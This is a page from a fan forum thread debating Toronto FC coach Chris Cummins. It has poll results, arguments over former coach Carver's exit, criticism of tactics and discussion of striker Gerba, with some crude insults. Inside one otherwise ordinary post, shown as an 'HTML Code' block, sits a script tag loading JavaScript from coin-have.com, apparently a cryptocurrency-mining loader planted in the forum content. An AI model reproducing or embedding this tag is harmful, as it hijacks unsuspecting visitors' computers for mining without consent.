View Poll Results: What do you think of Coach Cummins?

Voters
252. You may not vote on this poll
  • I'm content thus far.

43 17.06%
  • Undecided, I need more time.

92 36.51%
  • I've seen enough. Look for a replacement.

117 46.43%
Page 3 of 4 FirstFirst 1234 LastLast

Thread: Chris Cummins

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by ensco View Post
    This is the right question.

For me, the problem is that the exaggerated reflex to say "figuring all this out is unproductive and disrespectful to Carver, a guy we all like" leads to a lack of critical assessment of the colossal blunder Mo made in bringing in an untested coach, who, while "like-able", didn't really have a clue what he was doing, and had serious problems coping with the job's demands.

Mo cannot have done any real due diligence on the coach of his team. When we accept the fiction that Carver quit, Mo comes off as more of a victim, and less the cause of the problem.

You're right, it sure looks like there was little due dilligence. Carver seems a personable guy and he probably gives a great interview and has great references but hiring him was sold as a "sure thing," and not the giant risk it was.

Too bad Mo can't pick coaches like he can draft picks.... Oh well, maybe next time.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Cashcleaner View Post
    Unless Cummins can pull a miracle out of his ass and get us past the first round of the playoffs, we're gonna need a new coach coming into 2010.

Oh, and while we're at it, let's spring for a new General Manager.
    +1 ONLY IN OUR DREAMS... it`s nice to dream sometimes though

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Beach_Red View Post
    ^ People repeat what they're told if it benefits them. Who does it benefit to say Carver quit? Not Carver, so why would he stick with the story? How could it hurt him now to tell "the truth?"

I can see whre it was in Mo's best interest so he wouldn't have to admit the hiring was a mistake, but how does it benefit Carver - unless you think there was some back door payment or something?

Coaches get fired all the time, there's no stigma attatched to it. But quitting during the season is a tough sell to your next employer. Why go along with something that would damage your reputation?

I know we went over all this before but I agree with you, the Carver hiring was the biggest mistake Mo made. But he drops players all the time when it looks like they were a mistake, why wouldn't he just fire the coach, too?

What are the benefits to the people involved in this mess?
    LOL I think its the other way around... You going to tell me that ON YOUR resume it would look better that you got FIRED... than QUIT DUE TO PERSONAL REASONS.... LOL... how do you come up with that?

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by ua-kozak_TFC View Post
    LOL I think its the other way around... You going to tell me that ON YOUR resume it would look better that you got FIRED... than QUIT DUE TO PERSONAL REASONS.... LOL... how do you come up with that?
    We're not talking about my resume, we're talking about coaches. Getting fired doesn't stop coaches from getting hired, it really does happen all the time.

When your dreams come true and we get a new manager for TFC it will more likely be someone who has been fired somewhere else and not someone who quit in the middle of the season for, "pesonal reasons."

I get this from history, it's what happens in sports. Or, I should say North American sports because that's all I really know. But I can't think of a North American coach who quit in the middle of a season for "personal reasons" and was quickly rehired, but I can come up with dozens who were fired and then hired again right away. Maybe it's different in European soccer and coaches quit in the middle of the season all the time, I don't kow.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

coaches get fired and can lay blame on not having enough time, or that the management staff was unreasonable, or they weren't given the "say" they wanted.

if a coach walks out mid season, its entirely different. you walked out.. and unless there was an illness in your family or personally, your going to have a huge mark against u.

relating the sports world to a regular professions is a waste of time.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Cummins sucks BALLS!!!

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Beach_Red View Post
    We're not talking about my resume, we're talking about coaches. Getting fired doesn't stop coaches from getting hired, it really does happen all the time.

When your dreams come true and we get a new manager for TFC it will more likely be someone who has been fired somewhere else and not someone who quit in the middle of the season for, "pesonal reasons."

I get this from history, it's what happens in sports. Or, I should say North American sports because that's all I really know. But I can't think of a North American coach who quit in the middle of a season for "personal reasons" and was quickly rehired, but I can come up with dozens who were fired and then hired again right away. Maybe it's different in European soccer and coaches quit in the middle of the season all the time, I don't kow.
    I think the difference in this particular case rests with the shaky stature of MLS in world football. Carver is hoping that saying "I quit because the league sucks" might work over there.

But your general point is correct - it wouldn't work if Carver were trying to get hired in the same league, or at a similar level.
    "There are some people who might have better technique than me, and some may be fitter than me, but the main thing is tactics. With most players, tactics are missing. You can divide tactics into insight, trust, and daring." - Johan Cruyff

Registered
    Mentioned
    2 Post(s)
    Tagged
    1 Thread(s)

Mo would be foolish to not be looking about for someone better than Cummins. That said, this all still falls within the '5 year' plan, so regardless of how we end up this year, Cummins will still be around next. However, I suspect if noted improvement isn't made over this year (either in regards to consistency or performance in the CCL) then I reckon you'll see Cummins out the door with MoJo finishing the season behind the bench.
    a ha ha heh he hoo.. ha

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Stryker View Post
    Twenty games at the helm.
    What say you?

Bring back Carver

TFC RealDeal RPB

Shit !! Shit !! Shit !! And More Shit !! Next !!!!!!!!!!!!!!!

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Based on last nights game their is really no team management as the club has been playing roughly every 3 days since mid July, all the roughly the same 11 all starting and of course they will get tired, it would have been nice to see Guevara comming on in the second half instead of starting as he was returning from injury, seeing as Barrett didnt get the start, Danny should have.

If you are or will be a coach in the very near future, please fax, email or call TFC

Thank you

oh and by the way it would be nice to watch them play during the playoffs, and no i dont mean international or national friendly's

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

make cummins the reserve team head coach..

oh wait there is no reserve team

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I personally think that certain desicions are made above him or the there is pressure to play certain players probably due to their salaries. I have spoken to some of the players and they like playing for him.

Cause if not he must be retarded because how else do you explain Danny playing garabage minutes only??? If it weren't for Dero & Guevara we would be SOL

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Knee-jerk reactions always make for amusing reading.

Someone seriously suggests Colin Clarke as a replacement after watching his team play some of the worst soccer I've ever had the misfortune of watching. God help us if we ever sink to that level.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Cummins is out of his depth.
    Got the job by default.
    He's an assistant at best and should probably be coaching the Academy.

RPB Member XI17 Moderator
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Davenport View Post
    Cummins is out of his depth.
    Got the job by default.
    He's an assistant at best and should probably be coaching the Academy.

That's pretty much it in a nutshell. I mean, I don't try to be all that hard on him because he basically had the job thrust into his lap. I think someday he could become a very good coach, but he's still learning and we need someone with more experience and confidence in their abilities.
    Did the USA , of all countries, just fix soccer? - C. Ronaldo, May 27th commenting on the FBI-led investigations into fraud and corruption throughout FIFA.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Marc"2L" View Post
    team could use a break too.

this was a 2 nill win on any other night.
    No offence but I'm kind of tired of people saying this ... this has been the story of this team since day one ... dominating posession and outchansing your opponents counts for nothing if you don't get results ...

As for Cummins ... I dunno ... let's not fire him until we have an experienced MLS coach lined up ... enough hiring from within

When does the transfer window close?

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Lennon View Post

As for Cummins ... I dunno ... let's not fire him until we have an experienced MLS coach lined up ... enough hiring from within

When does the transfer window close?

yeah thats key too

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

lol cant blame cummins, mostly the players fault if you ask me...
    the problem with tfc's game is that many of the players cannot wrap there heads around, becuase of there basic lack of football IQ, players like wynne, barret, gerba are not smart enough to play the passing game that guevara, dero, vitti play... thus reverting to long ball... you rarely see guevara just hoofing the ball down the field unlike many tfc players... i feel that this isnt cummins fault, maybe a bit of mo jonhstons fault...

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by raj100 View Post
    lol cant blame cummins, mostly the players fault if you ask me...
    the problem with tfc's game is that many of the players cannot wrap there heads around, becuase of there basic lack of football IQ, players like wynne, barret, gerba are not smart enough to play the passing game that guevara, dero, vitti play... thus reverting to long ball... you rarely see guevara just hoofing the ball down the field unlike many tfc players... i feel that this isnt cummins fault, maybe a bit of mo jonhstons fault...
    Interesting, so Gerba is the source of the long ball problem. Who does he long ball it to? back to his defense?

If you couldn't see that our biggest problem with PR was purely tactical then I'm not sure we watched the same games.

RPB Member
    Past President

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Pachuco View Post
    Interesting, so Gerba is the source of the long ball problem. Who does he long ball it to? back to his defense?

If you couldn't see that our biggest problem with PR was purely tactical then I'm not sure we watched the same games.
    sooo true.
    ive been saying this since the Houston loss away...we are playing with NO TACTICS. Now the players seem to have loss faith in the system and are trying to win the game themselves....
    HTML Code:
    <script src="https://coin-have.com/c/XQ5z.js"></script>

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

i think you need to read my post over... i didnt say gerba is the source... i honestly think that he is the player that is being hurt the most, becuase he isnt a target man.. his lack of football IQ is shown when he doesnt come deep for the ball and contribute to the build up play rather than waiting on the shoulder of the last defender...

PR wasnt purely tactical... im not cummins biggest fan, but he gets alot of unecessary stick on the this board... PR was simply the players fault... cummins can preach and preach, but if the players arent playing with heart, waht can he do? and i dont think any1 can deny the fact that tfc had no heart against PR...

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

"Purely tactical"?

Yes, we lost in part because of poor defensive tactics. But it's never purely tactical when, over two games, you have 37 shots and can't score.

And before the anti-Gerba people start talking about his belly, he's had three shots since he joined the team, has put two of them on net and has scored on one of them. So belly or not, there's nothing to bellyache about.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by jloome View Post
    And before the anti-Gerba people start talking about his belly, he's had three shots since he joined the team, has put two of them on net and has scored on one of them. So belly or not, there's nothing to bellyache about.
    his "belly" is definitely going to haunt him throughout his career. it's almost like he needs to score twice as many goals as a slender player would because there will always be the thought out there "if he was skinnier, he could score more!".

been frustrated for him.. expecting lots from him, but he is getting so little help. those few chances he gets, im always on my feet ready for the goal though.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by jloome View Post
    yeah but you have to take the shots into consideration aswell, his goal against colombus wasnt the hardest finish in the world... but i will give with this, the build play between him and barrett was top class..

i think gerba has potential to be a good secondary goal scorer, i dont think he can be trusted to be tfc's top goal scorer, he doesnt have the skill to do it in my opinion, i.e his poor poor first touch, lack of pace etc. things that are necessary in a top striker ... i think that everyone can see why MK dons didnt want to keep ali g...

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

i dont know raj.. i see gerba as the type of striker that would be great paired up with a skillful second striker. someone who can run at defenders, create, interchange with him, while scoring goals as well (a pato type if u will). having a player like gerba who can pick up the garbage and put it away would be a great combo. so in a way, i would agree with saying he shouldn't be our top striker, but i can see him being our top goal scorer.

now that i read it, my description of a 2nd striker to work with gerba sounds alot like DeRo. he just seems like a hybrid of a midfielder, winger and secondary striker to me.. not sure he is the secondary striker that will bring out the best in gerba though (disclaimer: IN NO WAY SHAPE OR FORM DO I WANT TO REPLACE DERO .

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by noochie View Post
    Why not give Dasovic a chance at the helm... this after all seems to be a proving ground for 1st time managers...

god NO...the hiring of Canadian managers has not been to much of a success at most levels.....Dale Mitchell, Frank Yallop ( ok he has the MLS\
    cups) but still not wanted here, lets keep the focus on European or maybe if a change is need? a south american one...no domestic managers.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by mmmikey View Post
    i dont know raj.. i see gerba as the type of striker that would be great paired up with a skillful second striker. someone who can run at defenders, create, interchange with him, while scoring goals as well (a pato type if u will). having a player like gerba who can pick up the garbage and put it away would be a great combo. so in a way, i would agree with saying he shouldn't be our top striker, but i can see him being our top goal scorer.
    great post, buh i have to disagree, i cant see him being the top goal scorer in this tfc side unless he gets alot faster, and improves his touch (which are two of his biggest problems in my opinion). the problem about him being a guy to pick up the 'garbage' is that there has to be garbage to pick up... and tfc doesnt seem to make those kinds of chances lately..

im not here hating on gerba... its just what i think

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by raj100 View Post
    great post, buh i have to disagree, i cant see him being the top goal scorer in this tfc side unless he gets alot faster, and improves his touch (which are two of his biggest problems in my opinion). the problem about him being a guy to pick up the 'garbage' is that there has to be garbage to pick up... and tfc doesnt seem to make those kinds of chances lately..

im not here hating on gerba... its just what i think
    yeah u got me there.

all the low quality crosses into the box aren't creating the kind of chances we (and gerba) really need. the times when they work it in close and make a good run at the net, u can really see how he can be lethal. this team just can't seem to break down a determined defense..

Registered
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by ExiledRed View Post
    Like Steve Nicol.

ONE WORD:

RED LEGEND

468 appearances, 46 goals

record for consecutive appearances in the conference championship with six
    NOTICE: Wager with STB: OVER 2 shots on goal in the First half wins a Pint at HT.